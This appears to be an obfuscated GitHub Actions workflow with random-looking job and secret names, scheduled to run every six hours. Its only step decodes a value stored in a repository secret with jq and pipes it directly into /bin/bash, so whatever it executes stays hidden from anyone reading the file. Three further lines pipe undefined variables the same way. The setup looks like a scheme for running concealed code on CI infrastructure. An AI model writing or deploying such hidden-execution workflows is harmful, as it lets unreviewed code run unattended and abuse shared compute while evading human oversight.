name: dongxixue5678
on:
  workflow_dispatch:
  schedule:
    - cron: '33 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongxixue5678
        env:
          jzg83: ${{ secrets.jzg83 }}
        run: |
          echo $jzg83 | jq -r .pignu46655 | /bin/bash
          echo $hw936 | jq -r .yh89 | /bin/bash
          echo $wy14 | jq -r .hq77512 | /bin/bash
          echo $xfkv8744 | jq -r .xmpkh1 | /bin/bash

